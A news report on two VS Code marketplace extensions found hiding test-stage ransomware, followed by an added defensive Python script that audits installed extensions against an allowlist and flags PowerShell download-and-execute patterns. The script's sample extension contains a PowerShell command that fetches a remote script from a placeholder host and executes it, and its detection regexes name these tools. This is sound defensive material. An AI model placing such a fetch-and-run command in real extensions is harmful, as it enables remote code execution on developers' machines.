Security researchers at ReversingLabs have uncovered a significant security breach in the Visual Studio Code marketplace, where two extensions were found containing hidden ransomware capabilities. The compromised extensions, identified as “ahban.shiba” and “ahban.cychelloworld,” managed to evade detection for several months, highlighting critical vulnerabilities in the marketplace’s security verification process.
Technical Analysis of the Malicious Extensions
The investigation revealed that both extensions leveraged sophisticated PowerShell commands to download and execute malicious scripts from a remote server hosted on Amazon AWS. Analysis indicates that the ransomware was in its testing phase, with encryption deliberately limited to a single directory, C:\users\%username%\Desktop\testShiba, which suggests a controlled proof-of-concept deployment rather than a finished weapon.
Infection Timeline and Evolution
The threat emerged when “ahban.cychelloworld” was published on October 27, 2024, followed by “ahban.shiba” on February 17, 2025. According to ExtensionTotal researcher Itali Kruk, the initial version of ahban.cychelloworld was clean, but malicious code was introduced through version 0.0.2 on November 24, 2024. Subsequently, five more updates containing malicious payloads were pushed to users.
Ransomware Characteristics and Behavior
The malware’s experimental nature was evident in its simplified ransom demand, which displayed the message: “Your files are encrypted. Pay 1 ShibaCoin to ShibaWallet to restore them.” Unlike sophisticated ransomware strains, this variant lacked detailed payment instructions or communication channels, further supporting the assessment of its developmental status.
Security Implications and Response
Despite automated security scanning detecting the threat shortly after the malicious code’s introduction, Microsoft’s response was notably delayed. The extensions’ low installation base (7-8 downloads) may have contributed to the delayed reaction, though security experts emphasize that installation metrics should not influence the urgency of security responses.
This security incident exposes significant vulnerabilities in the VSCode Marketplace’s extension verification process, particularly concerning update validation. To enhance marketplace security, experts recommend implementing stricter code review procedures, establishing real-time malware detection systems, and developing rapid response protocols for all security threats, regardless of their apparent impact scale. Organizations utilizing VSCode are advised to implement strict extension approval processes and regularly audit their development environments for potential security compromises.
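The two recommendations above, an extension allowlist and a regular audit of the development environment, can be combined in one script. The following is an added example, not code from ReversingLabs, ExtensionTotal, or the article: it walks a VS Code extensions directory, reads each extension's package.json, checks the publisher.name identifier against a hypothetical organisational allowlist, and scans the extension's JavaScript for the PowerShell download-and-execute shape described in the technical analysis (a PowerShell invocation combined with a remote fetch such as Invoke-WebRequest or a dynamic execution such as Invoke-Expression). The allowlist contents, the indicator patterns, and the two sample extensions it builds in a temporary directory are all constructed for the demonstration; the rogue sample uses a placeholder URL and no real payload.

```python
"""Audit installed VS Code extensions: allowlist check plus a scan for
PowerShell download-and-execute indicators (added example, not the article's code)."""
import json
import re
import tempfile
from pathlib import Path

# Hypothetical organisational allowlist of approved extension IDs (publisher.name).
APPROVED_EXTENSIONS = {"ms-python.python", "esbenp.prettier-vscode"}

# Heuristic indicators of the behaviour the article describes: an extension
# shelling out to PowerShell to fetch a remote script and run it.
SUSPICIOUS_PATTERNS = {
    "powershell_invocation": re.compile(r"\bpowershell(?:\.exe)?\b", re.I),
    "remote_fetch": re.compile(r"Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile|\biwr\b", re.I),
    "dynamic_execution": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "encoded_command": re.compile(r"-EncodedCommand|-enc\b", re.I),
    "process_spawn": re.compile(r"child_process|execSync\(|spawn\(", re.I),
}


def read_extension_id(ext_dir: Path):
    """Return ('publisher.name', version) from package.json, or None if unreadable."""
    manifest = ext_dir / "package.json"
    if not manifest.is_file():
        return None
    try:
        data = json.loads(manifest.read_text(encoding="utf-8"))
    except (ValueError, OSError):
        return None
    return f"{data.get('publisher', '?')}.{data.get('name', ext_dir.name)}", data.get("version", "?")


def scan_sources(ext_dir: Path):
    """Return {indicator: ['file:line', ...]} for every pattern hit in the extension's .js files."""
    hits = {}
    for src in ext_dir.rglob("*.js"):
        if "node_modules" in src.parts:
            continue  # bundled dependencies are noisy; focus on the extension's own code
        try:
            lines = src.read_text(encoding="utf-8", errors="replace").splitlines()
        except OSError:
            continue
        for lineno, line in enumerate(lines, 1):
            for label, pattern in SUSPICIOUS_PATTERNS.items():
                if pattern.search(line):
                    hits.setdefault(label, []).append(f"{src.relative_to(ext_dir)}:{lineno}")
    return hits


def audit_extensions(extensions_root: Path, approved=APPROVED_EXTENSIONS):
    """Walk an extensions directory (e.g. ~/.vscode/extensions) and return one finding per extension."""
    findings = []
    for ext_dir in sorted(p for p in Path(extensions_root).iterdir() if p.is_dir()):
        ident = read_extension_id(ext_dir)
        if ident is None:
            findings.append({"dir": ext_dir.name, "id": None, "version": None, "approved": False,
                             "indicators": {}, "verdict": "unreadable-manifest"})
            continue
        ext_id, version = ident
        indicators = scan_sources(ext_dir)
        # PowerShell plus a fetch or dynamic execution is the download-and-execute
        # shape; it outranks allowlist status, since an approved ID can still be updated maliciously.
        chain = "powershell_invocation" in indicators and (
            "remote_fetch" in indicators or "dynamic_execution" in indicators)
        if chain:
            verdict = "download-and-execute"
        elif ext_id not in approved:
            verdict = "not-approved"
        elif indicators:
            verdict = "review"
        else:
            verdict = "clean"
        findings.append({"dir": ext_dir.name, "id": ext_id, "version": version,
                         "approved": ext_id in approved, "indicators": indicators, "verdict": verdict})
    return findings


def build_sample_tree(base: Path):
    """Write two constructed extensions: one benign and approved, one with the
    download-and-execute shape (placeholder URL, no real payload)."""
    benign = base / "esbenp.prettier-vscode-1.0.0"
    benign.mkdir(parents=True)
    (benign / "package.json").write_text(json.dumps(
        {"publisher": "esbenp", "name": "prettier-vscode", "version": "1.0.0"}))
    (benign / "extension.js").write_text('exports.activate = () => console.log("formatter ready");\n')

    rogue = base / "example-publisher.hello-sample-0.0.2"
    rogue.mkdir(parents=True)
    (rogue / "package.json").write_text(json.dumps(
        {"publisher": "example-publisher", "name": "hello-sample", "version": "0.0.2"}))
    (rogue / "extension.js").write_text(
        'const { execSync } = require("child_process");\n'
        'exports.activate = () => {\n'
        '  // constructed sample of the pattern described in the article; placeholder URL\n'
        '  execSync(\'powershell.exe -NoProfile -Command "Invoke-WebRequest https://placeholder.invalid/stage.ps1 | Invoke-Expression"\');\n'
        '};\n')
    return base


def run_demo():
    """Build the constructed samples in a temp dir and audit them; returns the findings list."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_extensions(build_sample_tree(Path(tmp)))


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['verdict']:22} {f['id']}@{f['version']} indicators={sorted(f['indicators'])}")
```

Against a real machine, call audit_extensions(Path.home() / ".vscode" / "extensions") and treat "download-and-execute" as an incident, "not-approved" as a policy violation, and "review" as a manual check; the indicator locations in each finding give a reviewer the exact file and line to inspect. The patterns are heuristics, so legitimate extensions that spawn PowerShell for build tooling will land in "review" and belong on the allowlist after inspection, and an update to an approved extension is re-scanned on every run, which is the update-validation gap the article calls out.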